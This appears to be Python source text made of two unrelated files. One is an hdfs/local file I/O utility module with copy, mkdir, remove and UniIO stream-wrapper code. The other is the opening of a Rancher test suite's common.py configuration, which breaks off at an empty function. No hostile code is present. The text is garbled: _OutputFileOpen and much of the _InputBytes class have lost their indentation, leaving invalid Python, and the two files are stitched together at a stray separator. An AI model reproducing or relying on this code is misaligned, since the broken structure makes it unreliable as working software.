        return list(listdir(directory, return_files=True, return_dirs=False))

    if path.endswith('*'):
        segments = path.split('/')
        parent = '/'.join(segments[:-1])
        prefix = segments[-1][:-1]
        matches = ['{}/{}'.format(parent, name)
                   for name in _files_in(parent) if name.startswith(prefix)]
    elif isdir(path):
        matches = ['{}/{}'.format(path, name) for name in _files_in(path)]
    else:
        matches = [path]
    random.shuffle(matches)
    return matches
def parse_path(path):
    """
    Expand a comma-separated path spec into a flat list of files.

    Empty entries (e.g. from a trailing comma) are skipped.
    """
    files = []
    for entry in path.strip().split(','):
        if not entry:
            continue
        files.extend(parse_single_path(entry))
    return files
def read_vocab(path):
    """
    Read a frequency vocabulary file.

    Each line is whitespace-separated tokens followed by an integer count.

    Args:
        path: path to restore vocab

    Returns:
        - list of (token, count) tuples in file order
    """
    freq = []
    with UniIO(path, 'r') as fin:
        for raw in fin:
            fields = SPACE_NORMALIZER.split(raw.strip('\n'))
            freq.append((' '.join(fields[:-1]), int(fields[-1])))
    return freq
def read_table(path):
    """
    Read a key/value table file.

    Each line is whitespace-separated key tokens followed by a value; the
    key tokens are rejoined with single spaces.

    Args:
        path: path to restore table

    Returns:
        - dict mapping key string to value string
    """
    table = {}
    with UniIO(path, 'r') as fin:
        for raw in fin:
            fields = SPACE_NORMALIZER.split(raw.strip('\n'))
            table[' '.join(fields[:-1])] = fields[-1]
    return table
def read_list(path):
    """
    Read a file as a list of lines (trailing newlines stripped).

    Args:
        path: path to restore list

    Returns:
        - list of strings
    """
    with UniIO(path, 'r') as fin:
        return [line.strip('\n') for line in fin]
def jsonable(x):
    """Return True when ``x`` can be serialized by json.dumps, else False."""
    try:
        json.dumps(x)
    except (TypeError, OverflowError):
        return False
    return True
def listdir(path, return_files=True, return_dirs=False, retry=5):
    """
    Given a path, return a list of files under this path

    :param path: directory (local, or hdfs: for ``hadoop fs -ls``)
    :param return_files: include regular files in the result
    :param return_dirs: include sub-directories in the result
    :param retry: number of attempts before logging a warning
    :return: a list of files / dirs
    :raises ValueError: when path is empty/falsy
    """
    def _listdir(path):
        # Parse long-listing output: lines starting with '-' are files,
        # lines starting with 'd' are directories.
        # NOTE(review): retval accumulates across retries, so a partially
        # successful attempt followed by a success can duplicate entries —
        # confirm acceptable. The ' '-split of `ls -l` also breaks on
        # filenames containing spaces.
        retval = list()
        returncode = 1
        for i in range(retry):
            if path.startswith('hdfs:'):
                output = subprocess.run('hadoop fs -ls {}'.format(path).split(), capture_output=True)
                returncode = output.returncode
                output = output.stdout
                output = str(output, encoding='utf8').split('\n')
                getname = lambda x: x.split('/')[-1]
                if return_files:
                    retval += [getname(f) for f in output if f.startswith('-')]
                if return_dirs:
                    retval += [getname(f) for f in output if f.startswith('d')]
            else:
                output = subprocess.run('ls -A -H -l {}'.format(path).split(), capture_output=True)
                returncode = output.returncode
                output = output.stdout
                output = str(output, encoding='utf8').split('\n')
                getname = lambda x: x.split(' ')[-1]
                if return_files:
                    retval += [getname(f) for f in output if f.startswith('-')]
                if return_dirs:
                    retval += [getname(f) for f in output if f.startswith('d')]
            if returncode == 0:
                break
        if returncode != 0:
            logger.warning(f'fail to listdir {path}')
        return retval
    if path:
        return _listdir(path)
    else:
        raise ValueError
def isdir(path):
    """
    Check whether ``path`` is a directory.

    hdfs: paths are tested via ``hadoop fs -test -d``; anything else is
    delegated to os.path.isdir.

    :param path: path to check
    :return: True when the path is an existing directory
    """
    if not path.startswith('hdfs:'):
        return os.path.isdir(path)
    result = subprocess.run('hadoop fs -test -d {}'.format(path).split(), capture_output=True)
    return result.returncode == 0
def wait_until_exist(path, timeout=10000):
    """
    Poll every 5 seconds until ``path`` exists.

    Returns True once the path is found, False (after a warning) when
    ``timeout`` seconds elapse first.
    """
    started = time.time()
    while not exists(path):
        if time.time() - started > timeout:
            logger.warning(f"timeout: {path} not found!")
            return False
        time.sleep(5)
    return True
def cp(src, tgt, retry=5, wait=False):
    """
    Copy a file from src to tgt

    Dispatches on hdfs: prefixes: hdfs->hdfs uses ``-cp``, hdfs->local
    ``-get``, local->hdfs ``-put``, local->local plain ``cp``. Runs only
    on the master process; with wait=False the copy happens in a forked
    background Process.

    :param src: source file / directory
    :param tgt: target file / directory
    :param retry: number of attempts before giving up
    :param wait: block until the copy finishes instead of forking
    :return:
    """
    def _cp(src, tgt):
        if not wait_until_exist(src):
            logger.info(f'timeout: {src} not found')
            return
        returncode = 1
        for i in range(retry):
            # Remove any pre-existing target so the copy is not rejected.
            if exists(tgt):
                remove(tgt, wait=True)
            if src.startswith('hdfs:') and tgt.startswith('hdfs:'):
                output = subprocess.run(["hadoop", "fs", "-cp", src, tgt], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            elif src.startswith('hdfs:') and not tgt.startswith('hdfs:'):
                output = subprocess.run(["hadoop", "fs", "-get", src, tgt], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            elif not src.startswith('hdfs:') and tgt.startswith('hdfs:'):
                output = subprocess.run(["hadoop", "fs", "-put", src, tgt], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            else:
                output = subprocess.run(["cp", src, tgt], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            returncode = output.returncode
            if returncode == 0:
                logger.info(f'successfully copy from {src} to {tgt}')
                break
        if returncode != 0:
            logger.warning(f'copy from {src} to {tgt} fails')
    env = Environment()
    if env.is_master():
        if wait:
            _cp(src, tgt)
        else:
            Process(target=_cp, args=(src, tgt)).start()
def mkdir(path, retry=5, wait=True):
    """
    Create a directory at path

    Uses ``hadoop fs -mkdir -p`` for hdfs: paths and ``mkdir -p`` locally.
    Runs only on the master process; with wait=False the work happens in a
    forked background Process.

    :param path: path to directory
    :param retry: number of attempts before giving up
    :param wait: block until done instead of forking
    :return:
    """
    def _mkdir(path):
        returncode = 1
        for i in range(retry):
            if path.startswith('hdfs:'):
                output = subprocess.run(["hadoop", "fs", "-mkdir", "-p", path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            else:
                output = subprocess.run(["mkdir", "-p", path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            returncode = output.returncode
            if returncode == 0:
                logger.info(f'successfully make directory: {path}')
                break
        if returncode != 0:
            logger.warning(f'mkdir {path} fails')
    env = Environment()
    if env.is_master() and path:
        if wait:
            _mkdir(path)
        else:
            Process(target=_mkdir, args=(path,)).start()
def remove(path, retry=5, wait=False):
    """
    Remove a directory or file

    Uses ``hadoop fs -rm`` for hdfs: paths and plain ``rm`` locally (so a
    local *directory* will not actually be removed — see remove_tree).
    Runs only on the master process; with wait=False the work happens in a
    forked background Process.

    :param path: path to remove
    :param retry: number of attempts before giving up
    :param wait: block until done instead of forking
    :return:
    """
    def _remove(path):
        if exists(path):
            returncode = 1
            for i in range(retry):
                if path.startswith('hdfs:'):
                    output = subprocess.run(['hadoop', 'fs', '-rm', path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
                else:
                    output = subprocess.run(['rm', path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
                returncode = output.returncode
                if returncode == 0:
                    logger.info(f'successfully remove file: {path}')
                    break
            if returncode != 0:
                logger.warning(f'remove file {path} fails')
    env = Environment()
    if env.is_master() and path:
        if wait:
            _remove(path)
        else:
            Process(target=_remove, args=(path,)).start()
def exists(path):
    """
    check if path exists

    hdfs: paths are probed with ``hadoop fs -stat``; everything else is
    delegated to os.path.exists.

    :param path: path to check
    :return: True when the path exists
    """
    if not path.startswith('hdfs:'):
        return os.path.exists(path)
    probe = subprocess.run(['hadoop', 'fs', '-stat', path], capture_output=True)
    return probe.returncode == 0
def not_exist(paths):
    """Return the first path in ``paths`` that does not exist, or None."""
    for candidate in paths:
        if not exists(candidate):
            return candidate
    return None
def remove_tree(path, retry=5, wait=True):
    """
    remove directory recursively

    Uses ``hadoop fs -rm -r`` for hdfs: paths and ``rm -r`` locally.
    Runs only on the master process; with wait=False the work happens in a
    forked background Process.

    :param path: path to remove
    :param retry: number of attempts before giving up
    :param wait: block until done instead of forking
    :return
    """
    def _rmtree(path):
        returncode = 1
        for i in range(retry):
            if path.startswith('hdfs:'):
                output = subprocess.run(['hadoop', 'fs', '-rm', '-r', path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            else:
                output = subprocess.run(['rm', '-r', path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            returncode = output.returncode
            if returncode == 0:
                logger.info(f'successfully remove directory: {path}')
                break
        if returncode != 0:
            logger.warning(f'remove directory {path} fails')
    env = Environment()
    if env.is_master() and path:
        if wait:
            _rmtree(path)
        else:
            Process(target=_rmtree, args=(path,)).start()
def create_data_map(path):
    """
    read a data map from path

    Each line of the file must be a JSON object (optionally carrying a
    'token_num' field, defaulting to 1).

    Returns:
        - list of (line_index, line_start_offset, token_num) tuples
    """
    data_map = []
    with UniIO(path) as fin:
        data_position = 0
        for i, line in enumerate(fin):
            d = json.loads(line)
            token_num = d['token_num'] if 'token_num' in d else 1
            data_map.append((i, data_position, token_num))
            # NOTE(review): offset advances by len(line) in *characters*, not
            # bytes — confirm consumers seek in the same units for non-ASCII.
            data_position += len(line)
    return data_map
def utf8len(s):
    """Return the number of bytes in the UTF-8 encoding of ``s``."""
    return len(bytes(s, 'utf-8'))
def _InputFileOpen(path, mode='r', encoding='utf8', timeout=-1, poll_interval=0.1, *args, **kwargs):
    """
    Open ``path`` for reading, transparently caching hdfs: files locally.

    hdfs: files are downloaded into TEMP_IO_SAVE_PATH (or kwargs['localpath'])
    with a lock-file protocol so concurrent processes share one download.

    Returns the opened file object, or None when opening fails.
    """
    try:
        if path.startswith('hdfs:'):
            if 'localpath' in kwargs:
                localpath = kwargs['localpath']
            else:
                localpath = TEMP_IO_SAVE_PATH + re.sub(r'[^\w]', '', path)
            lockfilename = localpath + '.lock'  # Multiprocess may read the file; they share the same cached file;
            # They need to wait until it is downloaded completely
            # NOTE(review): this exists-then-create check is not atomic, so
            # two processes can both "acquire" the lock — confirm acceptable.
            if not os.path.exists(lockfilename):  # acquire lock
                fd = os.open(lockfilename, os.O_WRONLY | os.O_CREAT | os.O_TRUNC)  # lock
                if os.path.exists(localpath):
                    os.remove(localpath)
                p = subprocess.run("hadoop fs -get {} {}".format(path, localpath).split(),
                                   capture_output=True)
                if p.returncode:
                    logger.warning(f'failed to open {path}, hadoop fs return code: {p.returncode}')
                os.close(fd)
                os.remove(lockfilename)  # release lock
            else:
                start = time.time()
                while True:  # Wait until the file is released (finished downloading)
                    if not os.path.exists(lockfilename):
                        break
                    if timeout >= 0 and time.time() - start > timeout:
                        logger.warning(f'failed to open {path}, file is locked, timeout')
                        break
                    time.sleep(poll_interval)
        else:
            localpath = path
        # Binary modes must not receive an encoding argument.
        if 'b' in mode.lower():
            istream = open(localpath, mode=mode)
        else:
            istream = open(localpath, mode=mode, encoding=encoding)
        # logger.info(f'successfully open file: {path}')
        return istream
    except Exception as e:
        logger.warning(f'open file {path} fails: {e}')
        return None
class _InputStream(TextIOBase):
    """
    A InputSteam wrapper to tackle with multiple files input

    Presents the files matched by ``path`` as one concatenated text
    stream, opening each underlying file lazily via _InputFileOpen.
    """
    def __init__(self, path, encoding='utf8'):
        super().__init__()
        self._paths = parse_path(path)
        # Per-process cache filename derived from the path list and pid.
        _hash = hash(''.join(self._paths + [str(os.getpid())]))
        _hash &= sys.maxsize
        self._localpath = os.path.join(TEMP_IO_SAVE_PATH, str(_hash))
        self._encoding = encoding
        self._idx = -1
        self._fin = None
        self._next_file()
    def _next_file(self):
        # Advance to the next openable file; raises StopIteration when the
        # path list is exhausted. Unopenable files are skipped recursively.
        if self._fin is not None:
            self._fin.close()
        self._idx += 1
        if 0 <= self._idx < len(self._paths):
            self._fin = _InputFileOpen(self._paths[self._idx], mode='r', encoding=self._encoding, localpath=self._localpath)
            if self._fin is None:
                self._next_file()
        else:
            raise StopIteration
    def reset(self):
        # Rewind to the first file.
        self._idx = -1
        self._next_file()
    def close(self):
        if self._fin is not None:
            self._fin.close()
        super().close()
    def __iter__(self):
        return self
    def __next__(self):
        try:
            if self._idx >= len(self._paths):
                raise IndexError
            return next(self._fin)
        except StopIteration:
            # Current file exhausted: hop to the next one and retry.
            try:
                self._next_file()
                return self.__next__()
            except Exception as e:
                raise e
        except IndexError:
            raise StopIteration
    def readline(self, size=-1):
        """Read the next line across file boundaries; '' at end of stream."""
        if self._fin is None or self._fin.closed:
            return ''
        sample = self._fin.readline(size)
        if sample:
            return sample
        try:
            self._next_file()
            return self.readline(size)
        except StopIteration:
            return ''
    def readlines(self, hint=-1):
        """Read lines until end of stream or until ``hint`` chars are read."""
        retval = []
        total_size = 0
        while hint is None or hint <= 0 or total_size <= hint:
            line = self.readline()
            if line:
                retval.append(line)
                total_size += len(line)
            else:
                break
        return retval
    def read(self, size=-1):
        """Read up to ``size`` chars (or everything remaining) across files."""
        if self._fin is None or self._fin.closed:
            return ''
        if size == -1:
            buffer = ''
            while True:
                buffer += self._fin.read()
                try:
                    self._next_file()
                except StopIteration:
                    break
            return buffer
        else:
            buffer = ['' for i in range(size)]
            offset = 0
            while size > 0:
                filesize = self._size(self._fin)
                if filesize <= size:
                    # Whole remainder of the current file fits in the budget.
                    buffer[offset : offset + filesize] = self._fin.read()
                    offset += filesize
                    size -= filesize
                    try:
                        self._next_file()
                    except StopIteration:
                        break
                else:
                    buffer[offset : ] = self._fin.read(size)
                    size = 0
            buffer = ''.join(buffer)
            return buffer
    def seek(self, offset, whence=os.SEEK_SET):
        """Seek across the concatenated stream; SEEK_CUR/SEEK_END only accept
        offset 0, mirroring TextIOBase semantics."""
        if whence == os.SEEK_SET:
            if offset < 0:
                raise OSError(22, 'Invalid argument')
            self.reset()
            _offset = offset
            while offset > 0:
                size = self._size(self._fin)
                if offset <= size:
                    self._fin.seek(offset, os.SEEK_SET)
                    offset = 0
                else:
                    offset -= size
                    try:
                        self._next_file()
                    except StopIteration:
                        break
            return _offset
        elif whence == os.SEEK_CUR:
            if offset:
                raise ValueError(f'invalid offset {offset}, offset must be zero')
            else:
                pass # do nothing, according to TextIOBase.seek()
            return self.tell()
        elif whence == os.SEEK_END:
            if offset:
                raise ValueError(f'invalid offset {offset}, offset must be zero')
            else:
                # Fast-forward through every remaining file.
                while True:
                    try:
                        self._next_file()
                    except StopIteration:
                        break
            return self.tell()
        else:
            raise ValueError(f'invalid whence ({whence}, should be 0, 1 or 2)')
    def tell(self):
        # Position within the *current* file only.
        return self._fin.tell() # Not a proper implementation
    def _size(self, fin):
        # Remaining characters in fin from its current position.
        cur = fin.tell()
        tail = fin.seek(0, os.SEEK_END)
        size = max(0, tail - cur)
        fin.seek(cur, os.SEEK_SET)
        return size
def _OutputFileOpen(path, localpath, mode='w', encoding='utf8'):
try:
if path.startswith('hdfs:'):
if not os.path.exists(TEMP_IO_SAVE_PATH):
os.mkdir(TEMP_IO_SAVE_PATH)
else:
localpath = path
if 'b' in mode.lower():
ostream = open(localpath, mode=mode)
else:
ostream = open(localpath, mode=mode, encoding=encoding)
return ostream
except Exception as e:
logger.warning(f'open file {path} fails: {e}')
class _OutputStream(TextIOBase):
    """
    OutputStream is an io wrapper to tackle with multiple kinds of path

    For hdfs: paths, writes go to a local cache file that is uploaded to
    the remote path on close().

    Args:
        path: output file path
    """
    def __init__(self, path, encoding='utf8'):
        super().__init__()
        self._path = path
        if self._path.startswith('hdfs:'):
            # Per-pid cache filename so concurrent writers do not collide.
            self._localpath = TEMP_IO_SAVE_PATH + re.sub(r'[^\w]', '', '{}_{}_w'.format(path, os.getpid()))
        else:
            self._localpath = path
        self._encoding = encoding
        self._fout = _OutputFileOpen(path, self._localpath, encoding=encoding)
    def reset(self):
        """
        Reset output stream
        """
        self._fout.seek(0)
    def close(self):
        """
        Close output stream

        For hdfs: targets this uploads the cached local file and blocks
        until the remote copy is visible.
        """
        self._fout.close()
        if self._path.startswith('hdfs:'):
            cp(self._localpath, self._path, wait=True)
            wait_until_exist(self._path)
        super().close()
    def write(self, content):
        """
        Write to output stream

        Args:
            content: str to write
        """
        self._fout.write(content)
    def writelines(self, content):
        """
        Write to output InputStream

        Args:
            content: list of str
        """
        self._fout.writelines(content)
    def seek(self, offset, whence=os.SEEK_SET):
        """
        The same as TextIOBase.seek()
        """
        return self._fout.seek(offset, whence)
    def tell(self):
        """
        The same as TextIOBase.tell()
        """
        return self._fout.tell()
class _InputBytes(IOBase):
"""
InputBytes is an io wrapper to tackle with multiple kinds of path
Args:
path: input file path
"""
def __init__(self, path, mode='rb'):
super().__init__()
self._paths = parse_path(path)
self._fins = [_InputFileOpen(path, mode=mode) for path in self._paths]
self._fins = [item for item in self._fins if item is not None]
self._sizes = [self._size(fin) for fin in self._fins]
self._idx = 0
def __iter__(self):
return self
def __next__(self):
"""
Fetch next line from file. The line terminator is b'\n'.
Returns:
- next line
"""
try:
if self._idx >= len(self._fins):
raise IndexError
sample = next(self._fins[self._idx])
return sample
except StopIteration:
self._idx += 1
sample = self.__next__()
return sample
except IndexError:
raise StopIteration
def reset(self):
"""
Reset input stream
"""
self._idx = 0
for fin in self._fins:
fin.seek(0)
def readline(self, size=-1):
"""
Read the next line. Return b'' at EOF. The line terminator is b'\n'.
Args:
size: read at most `size` bytes
Returns:
- next line
"""
try:
if size == 0:
return b''
if self._idx >= len(self._fins):
raise StopIteration
sample = self._fins[self._idx].readline(size)
if sample:
return sample
self._idx += 1
return self.readline(size)
except StopIteration:
return b''
def readlines(self, hint=-1):
"""
Read all lines and return in a list
Args:
hint: read at most `hint` bytes
Returns:
- list of lines
"""
retval = []
total_size = 0
while hint is None or hint <= 0 or total_size <= hint:
line = self.readline()
if line:
retval.append(line)
total_size += len(line)
else:
break
return retval
def read(self, size=-1):
"""
Read the rest of file
Args:
size: read at most `size` bytes
Returns:
- the rest of file
"""
if size == -1:
buffer = b''
while self._idx < len(self._fins):
buffer += self._fins[self._idx].read()
self._idx += 1
return buffer
else:
buffer = bytearray(size)
offset = 0
while self._idx < len(self._fins) and size > 0:
filesize = self._size(self._fins[self._idx])
if filesize <= size:
buffer[offset : offset + filesize] = self._fins[self._idx].read()
offset += filesize
self._idx += 1
size -= filesize
else:
buffer[offset : ] = self._fins[self._idx].read(size)
size = 0
buffer = bytes(buffer)
return buffer
def _size(self, fin):
# Given a file descriptor, calculate its size
cur = fin.tell()
tail = fin.seek(0, os.SEEK_END)
size = max(0, tail - cur)
fin.seek(cur, os.SEEK_SET)
return size
def tell(self):
    """
    Return the absolute current stream position: the summed sizes of all
    fully-consumed files plus the cursor offset inside the current file.
    Returns:
        - current stream position
    """
    pos = sum(self._sizes[:self._idx])
    if self._idx < len(self._fins):
        pos += self._fins[self._idx].tell()
    return pos
def seek(self, offset, whence=os.SEEK_SET):
    """
    Change the stream position to the given byte offset.
    Args:
        offset: byte offset
        whence: Values for whence are SEEK_SET (0), SEEK_CUR (1) or SEEK_END (2)
    Returns:
        Stream position after seek
    """
    if whence == os.SEEK_SET:
        if offset < 0:
            raise OSError(22, 'Invalid argument')
        # Absolute seek is implemented as a relative seek from the current position.
        return self.seek(offset - self.tell(), whence=os.SEEK_CUR)
    if whence == os.SEEK_CUR:
        # Clamp the file index into range before walking.
        self._idx = max(0, min(len(self._fins) - 1, self._idx))
        # Walk forward across files while a positive offset remains.
        while self._idx < len(self._fins) and offset > 0:
            filesize = self._size(self._fins[self._idx])  # bytes left in the current file
            if filesize < offset:
                # consume the rest of this file and continue in the next one
                self._fins[self._idx].seek(0, os.SEEK_END)
                self._idx += 1
                offset -= filesize
            else:
                self._fins[self._idx].seek(offset, os.SEEK_CUR)
                offset = 0
        # Walk backward across files while the offset is negative.
        while self._idx >= 0 and offset < 0:
            filesize = self._fins[self._idx].tell()  # bytes before the cursor in this file
            if offset + filesize < 0:
                # rewind this file fully and continue in the previous one
                self._fins[self._idx].seek(0, os.SEEK_SET)
                self._idx -= 1
                offset += filesize
            else:
                self._fins[self._idx].seek(offset, os.SEEK_CUR)
                offset = 0
        self._idx = max(0, min(len(self._fins) - 1, self._idx))
        return self.tell()
    if whence == os.SEEK_END:
        # Convert the end-relative offset into an absolute position.
        for i in range(len(self._fins)):
            offset += self._sizes[i]
        return self.seek(offset, whence=os.SEEK_SET)
    raise ValueError(f'invalid whence ({whence}, should be 0, 1 or 2)')
def close(self):
    """Close every underlying file handle, then this wrapper itself."""
    for handle in self._fins:
        handle.close()
    super().close()
class _OutputBytes(IOBase):
    """
    OutputBytes is an io wrapper to tackle with multiple kinds of path
    (local and remote, e.g. hdfs); writes go to a local staging file and
    are uploaded on close when the target is remote.
    Args:
        path: output file path
        mode: open mode passed through to the underlying writer
    """
    def __init__(self, path, mode='wb'):
        super().__init__()
        self._path = path
        # Local staging filename derived from path + pid so concurrent
        # writers of the same path do not clash.
        self._localpath = TEMP_IO_SAVE_PATH + re.sub(r'[^\w]', '', '{}_{}_w'.format(path, os.getpid()))
        self._fout = _OutputFileOpen(path, self._localpath, mode=mode)
    def reset(self):
        """
        Reset output stream (rewind the underlying writer to offset 0)
        """
        self._fout.seek(0)
    def close(self):
        """
        Close output stream; for hdfs targets, upload the staged local file
        and block until it is visible remotely.
        """
        self._fout.close()
        if self._path.startswith('hdfs:'):
            cp(self._localpath, self._path, wait=True)
            wait_until_exist(self._path)
        super().close()
    def write(self, content):
        """
        Write to output Stream
        Args:
            content: bytes to write
        """
        self._fout.write(content)
    def seek(self, offset, whence=os.SEEK_SET):
        """
        The same as IOBase.seek()
        """
        return self._fout.seek(offset, whence)
    def tell(self):
        """
        The same as IOBase.tell()
        """
        return self._fout.tell()
class UniIO(_InputStream, _OutputStream, _InputBytes, _OutputBytes):
    """
    A universal IO factory with the same interface as python:open.

    `__new__` dispatches on *mode* and returns one of the concrete stream
    wrappers. Because the returned object is an instance of a parent class
    rather than of UniIO itself, `__init__` is never invoked; it exists only
    to document the constructor signature.
    """
    def __init__(self, path, mode='r', encoding='utf8'):
        # Intentionally empty: __new__ returns a non-UniIO instance (see above).
        pass
    def __new__(cls, path, mode='r', encoding='utf8'):
        """
        Build the stream wrapper matching *mode*.
        Args:
            path: file path
            mode: open mode; must contain 'r' or 'w', optionally 'b' for binary
            encoding: text encoding for non-binary streams
        Raises:
            ValueError: when *mode* contains neither 'r' nor 'w'
        """
        lowered = mode.lower()
        if 'r' in lowered:
            if 'b' in lowered:
                return _InputBytes(path, mode=mode)
            return _InputStream(path, encoding=encoding)
        elif 'w' in lowered:
            if 'b' in lowered:
                return _OutputBytes(path, mode=mode)
            return _OutputStream(path, encoding=encoding)
        logger.warning(f'Not support file mode: {mode}')
        # Include the offending mode in the exception instead of a bare ValueError.
        raise ValueError(f'Not support file mode: {mode}')
|
common.py | import inspect
import json
import os
import random
import subprocess
import ssl
import time
import requests
import ast
import paramiko
import rancher
import pytest
from urllib.parse import urlparse
from rancher import ApiError
from lib.aws import AmazonWebServices
from copy import deepcopy
from threading import Lock
from threading import Thread
import websocket
import base64
# --- timeouts (seconds) used by the polling helpers below ---
DEFAULT_TIMEOUT = 120
DEFAULT_CATALOG_TIMEOUT = 15
DEFAULT_MONITORING_TIMEOUT = 180
DEFAULT_CLUSTER_STATE_TIMEOUT = 240
DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300
DEFAULT_APP_DELETION_TIMEOUT = 360
# --- Rancher server endpoints and credentials, all environment-driven ---
CATTLE_TEST_URL = os.environ.get('CATTLE_TEST_URL', "")
CATTLE_API_URL = CATTLE_TEST_URL + "/v3"
CATTLE_AUTH_URL = \
    CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login"
ADMIN_TOKEN = os.environ.get('ADMIN_TOKEN', "None")
USER_TOKEN = os.environ.get('USER_TOKEN', "None")
USER_PASSWORD = os.environ.get('USER_PASSWORD', "None")
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None")
# kubeconfig written next to this file by create_kubeconfig()
kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                          "k8s_kube_config")
MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200"))
# --- OS / image selection for test workloads ---
TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux")
TEST_IMAGE = os.environ.get('RANCHER_TEST_IMAGE', "sangeetha/mytestcontainer")
TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx")
TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu")
if TEST_OS == "windows":
    # Windows clusters are slower to converge; widen the default timeout.
    DEFAULT_TIMEOUT = 300
skip_test_windows_os = pytest.mark.skipif(
    TEST_OS == "windows",
    reason='Tests Skipped for including Windows nodes cluster')
CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "")
RANCHER_CLEANUP_CLUSTER = \
    ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True"))
env_file = os.path.join(
    os.path.dirname(os.path.realpath(__file__)),
    "rancher_env.config")
# --- AWS provisioning settings ---
AWS_SSH_KEY_NAME = os.environ.get("AWS_SSH_KEY_NAME")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_REGION = os.environ.get("AWS_REGION")
AWS_SUBNET = os.environ.get("AWS_SUBNET")
AWS_VPC = os.environ.get("AWS_VPC")
AWS_SG = os.environ.get("AWS_SG")
AWS_ZONE = os.environ.get("AWS_ZONE")
AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "")
AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "")
AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "")
LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None")
NFS_SERVER_MOUNT_PATH = "/nfs"
# --- feature toggles that gate whole test groups via pytest skip markers ---
TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False"))
if_test_rbac = pytest.mark.skipif(TEST_RBAC is False,
                                  reason='rbac tests are skipped')
TEST_ALL_SNAPSHOT = ast.literal_eval(
    os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False")
)
if_test_all_snapshot = \
    pytest.mark.skipif(TEST_ALL_SNAPSHOT is False,
                       reason='Snapshots check tests are skipped')
DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                           'resource')
# As of release 2.4 default rke scan profile is "rke-cis-1.4"
CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4")
# here are all supported roles for RBAC testing
CLUSTER_MEMBER = "cluster-member"
CLUSTER_OWNER = "cluster-owner"
PROJECT_MEMBER = "project-member"
PROJECT_OWNER = "project-owner"
PROJECT_READ_ONLY = "read-only"
# Shared mutable fixture state, populated by RBAC setup code at runtime.
rbac_data = {
    "project": None,
    "namespace": None,
    "workload": None,
    "p_unshared": None,
    "ns_unshared": None,
    "wl_unshared": None,
    "users": {
        CLUSTER_OWNER: {},
        CLUSTER_MEMBER: {},
        PROJECT_OWNER: {},
        PROJECT_MEMBER: {},
        PROJECT_READ_ONLY: {},
    }
}
auth_rbac_data = {
    "project": None,
    "namespace": None,
    "users": {}
}
# here are the global role templates used for
# testing globalRoleBinding and groupRoleBinding
TEMPLATE_MANAGE_CATALOG = {
    "newUserDefault": "false",
    "rules": [
        {
            "type": "/v3/schemas/policyRule",
            "apiGroups": [
                "management.cattle.io"
            ],
            "verbs": [
                "*"
            ],
            "resources": [
                "catalogs",
                "templates",
                "templateversions"
            ]
        }
    ],
    "name": "gr-test-manage-catalog",
}
TEMPLATE_LIST_CLUSTER = {
    "newUserDefault": "false",
    "rules": [
        {
            "type": "/v3/schemas/policyRule",
            "apiGroups": [
                "management.cattle.io"
            ],
            "verbs": [
                "get",
                "list",
                "watch"
            ],
            "resources": [
                "clusters"
            ]
        }
    ],
    "name": "gr-test-list-cluster",
}
# this is used when testing users from a auth provider
AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "")
if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]:
    # fail fast at import time on a misconfigured environment
    pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: "
                "activeDirectory, freeIpa, or openLdap (case sensitive).")
NESTED_GROUP_ENABLED = ast.literal_eval(
    os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False"))
# Admin Auth username and the shared password for all auth users
AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "")
# the link to log in as an auth user
LOGIN_AS_AUTH_USER_URL = \
    CATTLE_TEST_URL + "/v3-public/" \
    + AUTH_PROVIDER + "Providers/" \
    + AUTH_PROVIDER.lower() + "?action=login"
CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search"
# This is used for nested group when a third part Auth is enabled
nested_group = {
    "auth_info": None,
    "users": None,
    "group_dic": None,
    "groups": None
}
auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD
if_test_group_rbac = pytest.mark.skipif(
    auth_requirements,
    reason='Group RBAC tests are skipped.'
           'Required AUTH env variables '
           'have not been set.'
)
# -----------------------------------------------------------------------------
# global variables from test_create_ha.py
test_run_id = "test" + str(random.randint(10000, 99999))
RANCHER_HOSTNAME_PREFIX = os.environ.get("RANCHER_HOSTNAME_PREFIX",
                                         test_run_id)
# -----------------------------------------------------------------------------
def is_windows(os_type=TEST_OS):
    """Return True when *os_type* (default: env-driven TEST_OS) is "windows"."""
